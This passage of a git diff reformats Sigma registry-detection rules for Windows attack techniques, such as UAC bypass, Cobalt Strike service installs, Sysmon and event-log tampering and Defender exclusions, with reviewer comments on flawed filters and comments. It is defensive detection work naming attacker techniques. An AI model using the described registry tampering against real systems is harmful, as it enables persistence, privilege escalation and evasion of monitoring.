@@ -1,16 +1,15 @@ title: Wow6432Node Windows NT CurrentVersion Autorun Keys Modification id: 480421f9-417f-4d3b-9552-fd2728443ec8 related: - - id: 17f878b8-9968-4578-b814-c4217fc5768c - type: obsoletes + - id: 17f878b8-9968-4578-b814-c4217fc5768c + type: obsoletes status: experimental description: Detects modification of autostart extensibility point (ASEP) in registry. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d -author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, - oscd.community, Tim Shelton, frack113 (split) + - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys +author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) date: 2019/10/25 modified: 2023/08/17 tags: @@ -33,18 +32,15 @@ detection: filter: NewValue: - (Empty) - - \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image - File Execution Options - condition: registry_set and (wow_nt_current_version_base and wow_nt_current_version - and not filter) + - \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options + condition: registry_set and (wow_nt_current_version_base and wow_nt_current_version and not filter) fields: - SecurityID - ObjectName - OldValueType - NewValueType falsepositives: - - Legitimate software automatically (mostly, during installation) sets up autorun - keys for legitimate reason + - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason - Legitimate administrator sets up autorun keys for legitimate reason level: medium ruletype: Sigma 
diff --git a/sigma/builtin/registry/registry_set/registry_set_bginfo_custom_db.yml b/sigma/builtin/registry/registry_set/registry_set_bginfo_custom_db.yml index 796d9db38..100f23bf1 100644 --- a/sigma/builtin/registry/registry_set/registry_set_bginfo_custom_db.yml +++ b/sigma/builtin/registry/registry_set/registry_set_bginfo_custom_db.yml @@ -1,9 +1,7 @@ title: New BgInfo.EXE Custom DB Path Registry Configuration id: 53330955-dc52-487f-a3a2-da24dcff99b5 status: experimental -description: Detects setting of a new registry database value related to BgInfo configuration. - Attackers can for example set this value to save the results of the commands executed - by BgInfo in order to exfiltrate information. +description: Detects setting of a new registry database value related to BgInfo configuration. Attackers can for example set this value to save the results of the commands executed by BgInfo in order to exfiltrate information. references: - Internal Research author: Nasreddine Bencherchali (Nextron Systems) @@ -19,7 +17,7 @@ detection: EventID: 4657 Channel: Security selection: - OperationType: '%%1905' + OperationType: '%%1905' ObjectName|endswith: \Software\Winternals\BGInfo\Database condition: registry_set and selection falsepositives: diff --git a/sigma/builtin/registry/registry_set/registry_set_bginfo_custom_vbscript.yml b/sigma/builtin/registry/registry_set/registry_set_bginfo_custom_vbscript.yml index d08b11026..46d4d6109 100644 --- a/sigma/builtin/registry/registry_set/registry_set_bginfo_custom_vbscript.yml +++ b/sigma/builtin/registry/registry_set/registry_set_bginfo_custom_vbscript.yml 
@@ -1,11 +1,10 @@ title: New BgInfo.EXE Custom VBScript Registry Configuration id: 992dd79f-dde8-4bb0-9085-6350ba97cfb3 related: - - id: cd277474-5c52-4423-a52b-ac2d7969902f - type: similar + - id: cd277474-5c52-4423-a52b-ac2d7969902f + type: similar status: experimental -description: Detects setting of a new registry value related to BgInfo configuration, - which can be abused to execute custom VBScript via "BgInfo.exe" +description: Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom VBScript via "BgInfo.exe" references: - Internal Research author: Nasreddine Bencherchali (Nextron Systems) @@ -21,7 +20,7 @@ detection: EventID: 4657 Channel: Security selection: - OperationType: '%%1905' + OperationType: '%%1905' ObjectName|contains: \Software\Winternals\BGInfo\UserFields\ NewValue|startswith: '4' condition: registry_set and selection diff --git a/sigma/builtin/registry/registry_set/registry_set_bginfo_custom_wmi_query.yml b/sigma/builtin/registry/registry_set/registry_set_bginfo_custom_wmi_query.yml index 35f5b36cf..e96e5e434 100644 --- a/sigma/builtin/registry/registry_set/registry_set_bginfo_custom_wmi_query.yml +++ b/sigma/builtin/registry/registry_set/registry_set_bginfo_custom_wmi_query.yml @@ -1,11 +1,10 @@ title: New BgInfo.EXE Custom WMI Query Registry Configuration id: cd277474-5c52-4423-a52b-ac2d7969902f related: - - id: 992dd79f-dde8-4bb0-9085-6350ba97cfb3 - type: similar + - id: 992dd79f-dde8-4bb0-9085-6350ba97cfb3 + type: similar status: experimental -description: Detects setting of a new registry value related to BgInfo configuration, - which can be abused to execute custom WMI query via "BgInfo.exe" +description: Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom WMI query via "BgInfo.exe" references: - Internal Research author: Nasreddine Bencherchali (Nextron Systems) 
@@ -21,7 +20,7 @@ detection: EventID: 4657 Channel: Security selection: - OperationType: '%%1905' + OperationType: '%%1905' ObjectName|contains: \Software\Winternals\BGInfo\UserFields\ NewValue|startswith: '6' condition: registry_set and selection diff --git a/sigma/builtin/registry/registry_set/registry_set_blackbyte_ransomware.yml b/sigma/builtin/registry/registry_set/registry_set_blackbyte_ransomware.yml index a30ba820b..84a213f14 100644 --- a/sigma/builtin/registry/registry_set/registry_set_blackbyte_ransomware.yml +++ b/sigma/builtin/registry/registry_set/registry_set_blackbyte_ransomware.yml @@ -1,8 +1,7 @@ title: Blackbyte Ransomware Registry id: 83314318-052a-4c90-a1ad-660ece38d276 status: test -description: BlackByte set three different registry values to escalate privileges - and begin setting the stage for lateral movement and encryption +description: BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption references: - https://redcanary.com/blog/blackbyte-ransomware/?utm_source=twitter&utm_medium=social - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/ diff --git a/sigma/builtin/registry/registry_set/registry_set_bypass_uac_using_eventviewer.yml b/sigma/builtin/registry/registry_set/registry_set_bypass_uac_using_eventviewer.yml index b33e6f806..c9ec03071 100644 --- a/sigma/builtin/registry/registry_set/registry_set_bypass_uac_using_eventviewer.yml +++ b/sigma/builtin/registry/registry_set/registry_set_bypass_uac_using_eventviewer.yml 
@@ -1,8 +1,7 @@ title: Bypass UAC Using Event Viewer id: 674202d0-b22a-4af4-ae5f-2eda1f3da1af status: experimental -description: Bypasses User Account Control using Event Viewer and a relevant Windows - Registry modification +description: Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification references: - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-1---bypass-uac-using-event-viewer-cmd diff --git a/sigma/builtin/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task.yml b/sigma/builtin/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task.yml index aecf40c6f..e1d10e58c 100644 --- a/sigma/builtin/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task.yml +++ b/sigma/builtin/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task.yml @@ -1,9 +1,7 @@ title: Bypass UAC Using SilentCleanup Task id: 724ea201-6514-4f38-9739-e5973c34f49a status: test -description: There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe - This can be abused to elevate any file with Administrator privileges without prompting - UAC +description: There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-9---bypass-uac-using-silentcleanup-task - https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/ 
diff --git a/sigma/builtin/registry/registry_set/registry_set_change_rdp_port.yml b/sigma/builtin/registry/registry_set/registry_set_change_rdp_port.yml index 16f1e155f..beb56a9a5 100644 --- a/sigma/builtin/registry/registry_set/registry_set_change_rdp_port.yml +++ b/sigma/builtin/registry/registry_set/registry_set_change_rdp_port.yml @@ -1,15 +1,10 @@ title: Changing RDP Port to Non Standard Number id: 509e84b9-a71a-40e0-834f-05470369bd1e status: test -description: 'Remote desktop is a common feature in operating systems. - - It allows a user to log into an interactive session with a system desktop graphical - user interface on a remote system. - - Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as - Remote Desktop Services (RDS). - - ' +description: | + Remote desktop is a common feature in operating systems. + It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. + Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS). references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#atomic-test-1---rdp-to-domaincontroller author: frack113 diff --git a/sigma/builtin/registry/registry_set/registry_set_change_security_zones.yml b/sigma/builtin/registry/registry_set/registry_set_change_security_zones.yml index 7e267407d..bd3838189 100644 --- a/sigma/builtin/registry/registry_set/registry_set_change_security_zones.yml +++ b/sigma/builtin/registry/registry_set/registry_set_change_security_zones.yml @@ -1,8 +1,8 @@ title: IE Change Domain Zone id: 45e112d0-7759-4c2a-aa36-9f8fb79d3393 related: - - id: d88d0ab2-e696-4d40-a2ed-9790064e66b3 - type: derived + - id: d88d0ab2-e696-4d40-a2ed-9790064e66b3 + type: derived status: experimental description: Hides the file extension through modification of the registry references: 
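Review bot: The `description` kept on the new side of the registry_set_change_security_zones.yml hunk ("Hides the file extension through modification of the registry") does not describe this rule, whose title is "IE Change Domain Zone" and whose selection (second hunk of the file) matches writes under `Internet Settings\ZoneMap\Domains\` with a `NewValue` other than 0, 1 or empty. This reads like a copy-paste leftover, presumably inherited from the upstream rule, and the commit re-wraps the surrounding lines without touching it. I would replace it with `description: Detects a domain being assigned to an Internet Explorer security zone (Trusted, Internet or Restricted) via the ZoneMap\Domains registry key`, and since this repository looks auto-generated, the fix probably belongs in the upstream rule as well.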
@@ -25,8 +25,8 @@ detection: ObjectName|contains: \SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ filter: NewValue: - - DWORD (0x00000000) - - DWORD (0x00000001) + - DWORD (0x00000000) # My Computer + - DWORD (0x00000001) # Local Intranet Zone - (Empty) condition: registry_set and (selection_domains and not filter) falsepositives: diff --git a/sigma/builtin/registry/registry_set/registry_set_change_sysmon_driver_altitude.yml b/sigma/builtin/registry/registry_set/registry_set_change_sysmon_driver_altitude.yml index 6a51289f6..125b4552f 100644 --- a/sigma/builtin/registry/registry_set/registry_set_change_sysmon_driver_altitude.yml +++ b/sigma/builtin/registry/registry_set/registry_set_change_sysmon_driver_altitude.yml @@ -1,9 +1,7 @@ title: Disable Sysmon Event Logging Via Registry id: 4916a35e-bfc4-47d0-8e25-a003d7067061 status: experimental -description: Detects changes in Sysmon driver altitude. If the Sysmon driver is configured - to load at an altitude of another registered service, it will fail to load at - boot. +description: Detects changes in Sysmon driver altitude. If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot. references: - https://posts.specterops.io/shhmon-silencing-sysmon-via-driver-unload-682b5be57650 - https://youtu.be/zSihR3lTf7g diff --git a/sigma/builtin/registry/registry_set/registry_set_change_winevt_channelaccess.yml b/sigma/builtin/registry/registry_set/registry_set_change_winevt_channelaccess.yml index f752568ad..dd230c21f 100644 --- a/sigma/builtin/registry/registry_set/registry_set_change_winevt_channelaccess.yml +++ b/sigma/builtin/registry/registry_set/registry_set_change_winevt_channelaccess.yml 
@@ -1,8 +1,7 @@ title: Change Winevt Event Access Permission Via Registry id: 7d9263bd-dc47-4a58-bc92-5474abab390c status: experimental -description: Detects tampering with the "ChannelAccess" registry key in order to change - access to Windows event channel +description: Detects tampering with the "ChannelAccess" registry key in order to change access to Windows event channel references: - https://app.any.run/tasks/77b2e328-8f36-46b2-b2e2-8a80398217ab/ - https://learn.microsoft.com/en-us/windows/win32/api/winevt/ @@ -24,9 +23,9 @@ detection: ObjectName|startswith: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\ ObjectName|endswith: \ChannelAccess NewValue|contains: - - (A;;0x1;;;SY) - - (A;;0x5;;;BA) - - (A;;0x1;;;LA) + - (A;;0x1;;;SY) # Local System having GENERIC ALL + - (A;;0x5;;;BA) # Built-in administrators having GENERIC ALL and GENERIC WRITE + - (A;;0x1;;;LA) # Local administrator having GENERIC ALL filter_trustedinstaller: ProcessName: C:\Windows\servicing\TrustedInstaller.exe filter_ti_worker: diff --git a/sigma/builtin/registry/registry_set/registry_set_clickonce_trust_prompt.yml b/sigma/builtin/registry/registry_set/registry_set_clickonce_trust_prompt.yml index f24d09123..4c99663bf 100644 --- a/sigma/builtin/registry/registry_set/registry_set_clickonce_trust_prompt.yml +++ b/sigma/builtin/registry/registry_set/registry_set_clickonce_trust_prompt.yml 
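Review bot: The three inline comments added on the `NewValue|contains` entries of the second hunk (`@@ -24,9 +23,9 @@`) describe the SDDL access masks as GENERIC ALL / GENERIC WRITE, which does not match the event log channel access rights documented in the winevt reference this rule itself cites: in channel ACEs `0x1` is read, `0x2` is write and `0x4` is clear, while GENERIC_ALL and GENERIC_WRITE would be `0x10000000` and `0x40000000`. The point of the detection is the opposite of what the comments say — `(A;;0x1;;;SY)` leaves Local System with read access only, so the service can no longer write events to the channel, and `(A;;0x5;;;BA)` gives administrators read and clear but not write. I would change the comments to `# Local System restricted to read (0x1), which prevents events from being written`, `# Built-in administrators: read + clear (0x5), no write` and `# Local administrator restricted to read (0x1)` so an analyst understands why this value is suspicious.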
@@ -1,8 +1,7 @@ title: ClickOnce Trust Prompt Tampering id: ac9159cc-c364-4304-8f0a-d63fc1a0aabb status: experimental -description: Detects changes to the ClickOnce trust prompt registry key in order to - enable an installation from different locations such as the Internet. +description: Detects changes to the ClickOnce trust prompt registry key in order to enable an installation from different locations such as the Internet. references: - https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5 - https://learn.microsoft.com/en-us/visualstudio/deployment/how-to-configure-the-clickonce-trust-prompt-behavior diff --git a/sigma/builtin/registry/registry_set/registry_set_cobaltstrike_service_installs.yml b/sigma/builtin/registry/registry_set/registry_set_cobaltstrike_service_installs.yml index a166edbd5..ae44eaf9b 100644 --- a/sigma/builtin/registry/registry_set/registry_set_cobaltstrike_service_installs.yml +++ b/sigma/builtin/registry/registry_set/registry_set_cobaltstrike_service_installs.yml 
@@ -1,16 +1,10 @@ title: CobaltStrike Service Installations in Registry id: 61a7697c-cb79-42a8-a2ff-5f0cdfae0130 status: test -description: 'Detects known malicious service installs that appear in cases in which - a Cobalt Strike beacon elevates privileges or lateral movement. - +description: | + Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement. We can also catch this by system log 7045 (https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_cobaltstrike_service_installs.yml) - - In some SIEM you can catch those events also in HKLM\System\ControlSet001\Services - or HKLM\System\ControlSet002\Services, however, this rule is based on a regular - sysmon''s events. - - ' + In some SIEM you can catch those events also in HKLM\System\ControlSet001\Services or HKLM\System\ControlSet002\Services, however, this rule is based on a regular sysmon's events. references: - https://www.sans.org/webcasts/tech-tuesday-workshop-cobalt-strike-detection-log-analysis-119395 author: Wojciech Lesicki diff --git a/sigma/builtin/registry/registry_set/registry_set_creation_service_susp_folder.yml b/sigma/builtin/registry/registry_set/registry_set_creation_service_susp_folder.yml index f254f56b4..d47698d87 100644 --- a/sigma/builtin/registry/registry_set/registry_set_creation_service_susp_folder.yml +++ b/sigma/builtin/registry/registry_set/registry_set_creation_service_susp_folder.yml 
@@ -1,11 +1,10 @@ title: Service Binary in Suspicious Folder id: a07f0359-4c90-4dc4-a681-8ffea40b4f47 related: - - id: c0abc838-36b0-47c9-b3b3-a90c39455382 - type: obsoletes + - id: c0abc838-36b0-47c9-b3b3-a90c39455382 + type: obsoletes status: experimental -description: Detect the creation of a service with a service binary located in a suspicious - directory +description: Detect the creation of a service with a service binary located in a suspicious directory references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md author: Florian Roth (Nextron Systems), frack113 @@ -30,9 +29,10 @@ detection: - \ADMIN$\ - \Temp\ NewValue: - - DWORD (0x00000000) - - DWORD (0x00000001) - - DWORD (0x00000002) + - DWORD (0x00000000) # boot + - DWORD (0x00000001) # System + - DWORD (0x00000002) # Automatic + # 3 - Manual , 4 - Disabled selection_2: ObjectName|startswith: \REGISTRY\MACHINE\System\CurrentControlSet\Services\ ObjectName|endswith: \ImagePath @@ -42,7 +42,7 @@ detection: - \ADMIN$\ - \Temp\ filter_1: - ProcessName|contains|all: + ProcessName|contains|all: # Filter FP with Avast software - \Common Files\ - \Temp\ condition: registry_set and (1 of selection_* and not 1 of filter_*) diff --git a/sigma/builtin/registry/registry_set/registry_set_creation_service_uncommon_folder.yml b/sigma/builtin/registry/registry_set/registry_set_creation_service_uncommon_folder.yml index 12b17b8eb..fa47673dc 100644 --- a/sigma/builtin/registry/registry_set/registry_set_creation_service_uncommon_folder.yml +++ b/sigma/builtin/registry/registry_set/registry_set_creation_service_uncommon_folder.yml 
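Review bot: The comment added to `filter_1` in the third hunk (`@@ -42,7 +42,7 @@`), "Filter FP with Avast software", is narrower than the filter it annotates: `ProcessName|contains|all` with only `\Common Files\` and `\Temp\` exempts any process whose path contains both fragments, not just Avast, and a service installed from such a path is exactly what this rule is meant to catch. Either the comment should say the exclusion is generic, or the filter should carry a vendor-specific path element as a third `contains|all` entry (e.g. `- \Avast\`, to be confirmed against the false-positive path that motivated it). The `detection` block continues outside this hunk.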
@@ -1,8 +1,7 @@ title: Service Binary in Uncommon Folder id: 277dc340-0540-42e7-8efb-5ff460045e07 status: experimental -description: Detect the creation of a service with a service binary located in a uncommon - directory +description: Detect the creation of a service with a service binary located in a uncommon directory references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md author: Florian Roth (Nextron Systems) @@ -25,9 +24,10 @@ detection: - \AppData\Local\ - \AppData\Roaming\ NewValue: - - DWORD (0x00000000) - - DWORD (0x00000001) - - DWORD (0x00000002) + - DWORD (0x00000000) # boot + - DWORD (0x00000001) # System + - DWORD (0x00000002) # Automatic + # 3 - Manual , 4 - Disabled selection_2: ObjectName|startswith: \REGISTRY\MACHINE\System\CurrentControlSet\Services\ ObjectName|endswith: \ImagePath @@ -35,12 +35,12 @@ detection: - \AppData\Local\ - \AppData\Roaming\ filter: - - ProcessName|contains: - - \AppData\Roaming\Zoom - - \AppData\Local\Zoom - - NewValue|contains: - - \AppData\Roaming\Zoom - - \AppData\Local\Zoom + - ProcessName|contains: + - \AppData\Roaming\Zoom + - \AppData\Local\Zoom + - NewValue|contains: + - \AppData\Roaming\Zoom + - \AppData\Local\Zoom condition: registry_set and (1 of selection_* and not filter) falsepositives: - Unknown diff --git a/sigma/builtin/registry/registry_set/registry_set_cve_2020_1048_new_printer_port.yml b/sigma/builtin/registry/registry_set/registry_set_cve_2020_1048_new_printer_port.yml index 9bc2fe8e3..33a1ae1fe 100644 --- a/sigma/builtin/registry/registry_set/registry_set_cve_2020_1048_new_printer_port.yml +++ b/sigma/builtin/registry/registry_set/registry_set_cve_2020_1048_new_printer_port.yml 
@@ -1,8 +1,7 @@ title: Suspicious New Printer Ports in Registry (CVE-2020-1048) id: 7ec912f2-5175-4868-b811-ec13ad0f8567 status: test -description: Detects a new and suspicious printer port creation in Registry that could - be an attempt to exploit CVE-2020-1048 +description: Detects a new and suspicious printer port creation in Registry that could be an attempt to exploit CVE-2020-1048 references: - https://windows-internals.com/printdemon-cve-2020-1048/ author: EagleEye Team, Florian Roth (Nextron Systems), NVISO diff --git a/sigma/builtin/registry/registry_set/registry_set_cve_2022_30190_msdt_follina.yml b/sigma/builtin/registry/registry_set/registry_set_cve_2022_30190_msdt_follina.yml index b78df5825..5a59d82ed 100644 --- a/sigma/builtin/registry/registry_set/registry_set_cve_2022_30190_msdt_follina.yml +++ b/sigma/builtin/registry/registry_set/registry_set_cve_2022_30190_msdt_follina.yml @@ -1,8 +1,7 @@ title: Suspicious Set Value of MSDT in Registry (CVE-2022-30190) id: 2d9403d5-7927-46b7-8216-37ab7c9ec5e3 status: test -description: Detects set value ms-msdt MSProtocol URI scheme in Registry that could - be an attempt to exploit CVE-2022-30190. +description: Detects set value ms-msdt MSProtocol URI scheme in Registry that could be an attempt to exploit CVE-2022-30190. references: - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190 - https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/ diff --git a/sigma/builtin/registry/registry_set/registry_set_dbgmanageddebugger_persistence.yml b/sigma/builtin/registry/registry_set/registry_set_dbgmanageddebugger_persistence.yml index 5840a8924..11c033c96 100644 --- a/sigma/builtin/registry/registry_set/registry_set_dbgmanageddebugger_persistence.yml +++ b/sigma/builtin/registry/registry_set/registry_set_dbgmanageddebugger_persistence.yml 
@@ -1,9 +1,7 @@ title: Potential Registry Persistence Attempt Via DbgManagedDebugger id: 9827ae57-3802-418f-994b-d5ecf5cd974b status: experimental -description: Detects the addition of the "Debugger" value to the "DbgManagedDebugger" - key in order to achieve persistence. Which will get invoked when an application - crashes +description: Detects the addition of the "Debugger" value to the "DbgManagedDebugger" key in order to achieve persistence. Which will get invoked when an application crashes references: - https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/ - https://github.com/last-byte/PersistenceSniper @@ -23,11 +21,9 @@ detection: selection: ObjectName|endswith: \Microsoft\.NETFramework\DbgManagedDebugger filter: - NewValue: '"C:\Windows\system32\vsjitdebugger.exe" PID %d APPDOM %d EXTEXT - "%s" EVTHDL %d' + NewValue: '"C:\Windows\system32\vsjitdebugger.exe" PID %d APPDOM %d EXTEXT "%s" EVTHDL %d' condition: registry_set and (selection and not filter) falsepositives: - - Legitimate use of the key to setup a debugger. Which is often the case on developers - machines + - Legitimate use of the key to setup a debugger. Which is often the case on developers machines level: medium ruletype: Sigma diff --git a/sigma/builtin/registry/registry_set/registry_set_defender_exclusions.yml b/sigma/builtin/registry/registry_set/registry_set_defender_exclusions.yml index a82d8178b..037fa2f67 100644 --- a/sigma/builtin/registry/registry_set/registry_set_defender_exclusions.yml +++ b/sigma/builtin/registry/registry_set/registry_set_defender_exclusions.yml @@ -1,8 +1,8 @@ title: Windows Defender Exclusions Added - Registry id: a982fc9c-6333-4ffb-a51d-addb04e8b529 related: - - id: 1321dc4e-a1fe-481d-a016-52c45f0c8b4f - type: derived + - id: 1321dc4e-a1fe-481d-a016-52c45f0c8b4f + type: derived status: test description: Detects the Setting of Windows Defender Exclusions references: 
diff --git a/sigma/builtin/registry/registry_set/registry_set_desktop_background_change.yml b/sigma/builtin/registry/registry_set/registry_set_desktop_background_change.yml index 94eea8ab4..4b0071755 100644 --- a/sigma/builtin/registry/registry_set/registry_set_desktop_background_change.yml +++ b/sigma/builtin/registry/registry_set/registry_set_desktop_background_change.yml @@ -1,16 +1,12 @@ title: Potentially Suspicious Desktop Background Change Via Registry id: 85b88e05-dadc-430b-8a9e-53ff1cd30aae related: - - id: 8cbc9475-8d05-4e27-9c32-df960716c701 - type: similar + - id: 8cbc9475-8d05-4e27-9c32-df960716c701 + type: similar status: experimental -description: 'Detects regsitry value settings that would replace the user''s desktop - background. - - This is a common technique used by malware to change the desktop background to - a ransom note or other image. - - ' +description: | + Detects regsitry value settings that would replace the user's desktop background. + This is a common technique used by malware to change the desktop background to a ransom note or other image. references: - https://www.attackiq.com/2023/09/20/emulating-rhysida/ - https://research.checkpoint.com/2023/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/ @@ -46,11 +42,10 @@ detection: ObjectName|endswith: \WallpaperStyle NewValue: '2' filter_main_svchost: + # Note: Excluding GPO changes ProcessName|endswith: \svchost.exe - condition: registry_set and (selection_keys and 1 of selection_values_* and not - 1 of filter_main_*) + condition: registry_set and (selection_keys and 1 of selection_values_* and not 1 of filter_main_*) falsepositives: - - Administrative scripts that change the desktop background to a company logo - or other image. + - Administrative scripts that change the desktop background to a company logo or other image. level: medium ruletype: Sigma 
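Review bot: The `filter_main_svchost` exclusion on the new side of the second hunk (`@@ -46,11 +42,10 @@`) matches `ProcessName|endswith: \svchost.exe`, so any binary named svchost.exe in any directory bypasses the rule, while the added comment says the intent is only to exclude Group Policy driven changes. Security 4657 events carry the full image path, so the filter can be pinned to the system binary, `ProcessName: C:\Windows\System32\svchost.exe`, as other process-path filters in this rule set do. Even then the filter exempts every svchost-hosted service, not just GPO processing, which is worth stating in the comment, e.g. `# Note: Excluding GPO changes (also exempts any other svchost-hosted service)`.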
diff --git a/sigma/builtin/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled.yml b/sigma/builtin/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled.yml index 282e9dffd..f10ccbf32 100644 --- a/sigma/builtin/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled.yml +++ b/sigma/builtin/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled.yml @@ -1,10 +1,7 @@ title: Hypervisor Enforced Code Integrity Disabled id: 8b7273a4-ba5d-4d8a-b04f-11f2900d043a status: experimental -description: Detects changes to the HypervisorEnforcedCodeIntegrity registry key and - the "Enabled" value being set to 0 in order to disable the Hypervisor Enforced - Code Integrity feature. This allows an attacker to load unsigned and untrusted - code to be run in the kernel +description: Detects changes to the HypervisorEnforcedCodeIntegrity registry key and the "Enabled" value being set to 0 in order to disable the Hypervisor Enforced Code Integrity feature. This allows an attacker to load unsigned and untrusted code to be run in the kernel references: - https://www.welivesecurity.com/2023/03/01/blacklotus-uefi-bootkit-myth-confirmed/ - https://github.com/redcanaryco/atomic-red-team/blob/04e487c1828d76df3e834621f4f893ea756d5232/atomics/T1562.001/T1562.001.md#atomic-test-43---disable-hypervisor-enforced-code-integrity-hvci @@ -22,7 +19,7 @@ detection: EventID: 4657 Channel: Security selection: - OperationType: '%%1905' + OperationType: '%%1905' ObjectName|endswith: - \Microsoft\Windows\DeviceGuard\HypervisorEnforcedCodeIntegrity - \Control\DeviceGuard\HypervisorEnforcedCodeIntegrity diff --git a/sigma/builtin/registry/registry_set/registry_set_dhcp_calloutdll.yml b/sigma/builtin/registry/registry_set/registry_set_dhcp_calloutdll.yml index b0c9a27b3..91bf853b1 100644 --- a/sigma/builtin/registry/registry_set/registry_set_dhcp_calloutdll.yml 
+++ b/sigma/builtin/registry/registry_set/registry_set_dhcp_calloutdll.yml @@ -1,9 +1,7 @@ title: DHCP Callout DLL Installation id: 9d3436ef-9476-4c43-acca-90ce06bdf33a status: test -description: Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled - parameter in Registry, which can be used to execute code in context of the DHCP - server (restart required) +description: Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required) references: - https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html - https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx diff --git a/sigma/builtin/registry/registry_set/registry_set_disable_administrative_share.yml b/sigma/builtin/registry/registry_set/registry_set_disable_administrative_share.yml index 3edb2f9b6..d0b2ee419 100644 --- a/sigma/builtin/registry/registry_set/registry_set_disable_administrative_share.yml +++ b/sigma/builtin/registry/registry_set/registry_set_disable_administrative_share.yml @@ -1,9 +1,7 @@ title: Disable Administrative Share Creation at Startup id: c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e status: test -description: Administrative shares are hidden network shares created by Microsoft - Windows NT operating systems that grant system administrators remote access to - every disk volume on a network-connected system +description: Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md#atomic-test-4---disable-administrative-share-creation-at-startup author: frack113 
diff --git a/sigma/builtin/registry/registry_set/registry_set_disable_autologger_sessions.yml b/sigma/builtin/registry/registry_set/registry_set_disable_autologger_sessions.yml index 0299359c1..8d30f67c7 100644 --- a/sigma/builtin/registry/registry_set/registry_set_disable_autologger_sessions.yml +++ b/sigma/builtin/registry/registry_set/registry_set_disable_autologger_sessions.yml @@ -1,8 +1,7 @@ title: Potential AutoLogger Sessions Tampering id: f37b4bce-49d0-4087-9f5b-58bffda77316 status: experimental -description: Detects tampering with autologger trace sessions which is a technique - used by attackers to disable logging +description: Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging references: - https://twitter.com/MichalKoczwara/status/1553634816016498688 - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/ diff --git a/sigma/builtin/registry/registry_set/registry_set_disable_defender_firewall.yml b/sigma/builtin/registry/registry_set/registry_set_disable_defender_firewall.yml index 9f12bfaba..3fad34dbc 100644 --- a/sigma/builtin/registry/registry_set/registry_set_disable_defender_firewall.yml +++ b/sigma/builtin/registry/registry_set/registry_set_disable_defender_firewall.yml @@ -1,8 +1,7 @@ title: Disable Microsoft Defender Firewall via Registry id: 974515da-6cc5-4c95-ae65-f97f9150ec7f status: test -description: Adversaries may disable or modify system firewalls in order to bypass - controls limiting network usage +description: Adversaries may disable or modify system 